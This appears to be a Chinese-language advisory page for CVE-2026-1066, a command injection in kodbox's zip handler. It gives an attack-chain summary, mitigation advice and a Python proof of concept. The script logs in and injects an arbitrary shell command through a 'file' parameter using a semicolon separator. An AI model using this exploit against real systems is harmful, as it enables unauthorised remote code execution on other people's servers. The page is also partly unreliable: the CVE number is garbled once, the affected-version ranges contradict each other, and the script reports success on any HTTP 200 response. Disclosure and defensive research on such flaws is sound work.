CVE-2026-1066 kalcaddle kodbox压缩组件命令执行漏洞

漏洞信息

漏洞编号

CVE-2026-1066

漏洞类型

命令执行

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle kodbox

漏洞概述

CVE-2026-2026-1066是kalcaddle kodbox文件管理器中存在的一个命令执行漏洞。该漏洞影响了kodbox从初始版本到1.61.10的所有版本。漏洞位于压缩处理组件（Compression Handler）中，具体涉及/?explorer/index/zip路径的处理逻辑。攻击者可以通过操控ZIP压缩功能的输入参数，在服务器上执行任意系统命令。该漏洞被评定为中危级别，CVSS评分为6.3，攻击复杂度低且无需用户交互，但需要低权限认证。由于该漏洞已公开披露且可能被利用，建议相关用户尽快采取防护措施。kalcaddle kodbox是一款开源的网页文件管理器，常用于团队文件共享和管理场景。

技术细节

该漏洞属于典型的命令注入（Command Injection）类型。问题出在kodbox的压缩处理模块对用户输入的验证不充分。攻击者通过构造特殊的ZIP文件名或压缩路径参数，可以在服务器端执行系统命令。具体来说，攻击者利用/?explorer/index/zip接口时，通过在文件名或路径中注入分号、管道符等shell命令分隔符，使得服务器在处理压缩请求时将恶意命令一并执行。漏洞的利用条件包括：1）攻击者需要拥有kodbox的低权限账户；2）能够访问压缩功能模块；3）目标服务器使用Linux/Unix系统。由于该漏洞无需复杂的攻击准备，且影响版本范围较广，因此具有较高的实际威胁性。

攻击链分析

STEP 1

步骤1

攻击者获取kodbox低权限账户访问权限

STEP 2

步骤2

访问/?explorer/index/zip压缩功能接口

STEP 3

步骤3

构造包含恶意命令的文件名或路径参数

STEP 4

步骤4

利用shell命令分隔符注入系统命令

STEP 5

步骤5

服务器执行压缩操作时触发恶意命令

STEP 6

步骤6

攻击者获得服务器命令执行权限，实现远程控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1066 PoC - kalcaddle kodbox Command Injection
# Target: kalcaddle kodbox <= 1.61.10
# Component: Compression Handler (/explorer/index/zip)

def exploit(target_url, username, password, command):
    """
    Exploit for CVE-2026-1066
    This PoC demonstrates command injection in kodbox zip handler
    """
    # Login to kodbox
    login_url = target_url + '/?user/login'
    login_data = {
        'user': username,
        'password': password
    }
    
    session = requests.Session()
    resp = session.post(login_url, data=login_data)
    
    if resp.status_code != 200:
        print('[-] Login failed')
        return False
    
    # Exploit command injection via zip component
    # Inject command using filename parameter
    exploit_url = target_url + '/?explorer/index/zip'
    
    # Construct malicious payload
    # Example: filename containing command injection
    payload = {'file': f'test.zip;{command};#'}
    
    try:
        resp = session.post(exploit_url, data=payload, timeout=10)
        if resp.status_code == 200:
            print(f'[+] Command executed successfully: {command}')
            return True
    except Exception as e:
        print(f'[-] Error: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <command>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]
    
    exploit(target, user, pwd, cmd)

影响范围

kalcaddle kodbox < 1.61.10

kalcaddle kodbox 1.x 所有版本

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）禁用或限制压缩功能模块的访问权限；2）使用白名单机制严格限制文件名和路径输入；3）在Web服务器层面配置安全策略，过滤特殊字符如分号、管道符、反引号等；4）加强对用户上传文件的类型和内容检查；5）监控和审计压缩功能的访问日志，及时发现异常行为；6）考虑使用容器化部署，将kodbox运行在隔离环境中以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1066
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1066
3 Details https://www.cvedetails.com/cve/CVE-2026-1066/
4 VulDB https://vuldb.com/cve/CVE-2026-1066
5 Link https://github.com/DReazer/CV3/blob/main/Krce.md
6 Link https://vuldb.com/?ctiid.341665
7 Link https://vuldb.com/?id.341665
8 Link https://vuldb.com/?submit.731436